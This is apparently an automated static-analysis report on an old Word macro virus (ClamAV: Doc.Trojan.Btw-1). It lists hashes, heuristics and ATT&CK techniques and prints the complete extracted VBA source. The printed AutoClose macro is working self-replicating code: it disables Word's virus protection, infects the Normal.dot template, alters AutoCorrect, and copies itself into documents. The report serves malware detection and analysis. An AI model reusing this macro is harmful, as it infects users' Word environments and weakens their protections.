Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6599647bd586c869…

MALICIOUS

Office (OLE)

27.5 KB Created: 2001-07-04 13:55:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 382daa1f2e56d9258a90fd69f43c731c SHA-1: d452f60efd44739e5c8887f393737fbbc106ef2d SHA-256: 6599647bd586c86997674468dc1757a17ebbf4b442ebe36c45181ab315441ac4
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Word document containing a malicious VBA macro, specifically an AutoClose macro, which is a known technique for malware propagation. The script attempts to disable virus protection and copy itself to the Normal.dot template, indicating an intent to infect the user's Word environment. The ClamAV detection further confirms its malicious nature.

Heuristics 4

  • ClamAV: Doc.Trojan.Btw-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Btw-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1490 bytes
SHA-256: 1bc714c8a69bdc668ca4eacdb2dcf0d892a58fdeb481d4d7a1d0db23a54425ef
Detection
ClamAV: Doc.Trojan.Btw-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoR"
Sub AutoClose()
Attribute AutoClose.VB_Description = "Ěŕęđîń ńîçäŕí "
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Normal.AutoR.AutoClose"
'Autor
'Íîđěŕëüíűé âčđóńîę...  Áĺçîáčäíűé ŕáńîëţňíî
'Ďđč ďîěîůč ĺăî âű ńěîćĺňĺ áűńňđĺĺ îńâîčňü Word :-)))

  On Error Resume Next
  Application.Options.VirusProtection = False
  Application.Options.SaveNormalPrompt = False
  Application.Options.ConfirmConversions = False
  
    Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "Autor", wdOrganizerObjectProjectItems
  
  If NormalTemplate.Saved = False Then NormalTemplate.Save

    myValue = ", ęńňŕňč,"
    Ol = True
    For Each anEntry In AutoCorrect.Entries
        If anEntry.Name = myValue Then Ol = False
    Next anEntry
    If Ol Then NormalTemplate.Application.AutoCorrect.Entries.Add Name:=",", Value:=myValue
    
    s = ""
    NormalTemplate.VBProject.VBComponents("AutoR").Export ("c:\Repeat.tmp")
    ActiveDocument.VBProject.VBComponents.Import ("c:\Repeat.tmp")
    ActiveDocument.SaveAs ActiveDocument.FullName
    Kill ("c:\Repeat.tmp")

End Sub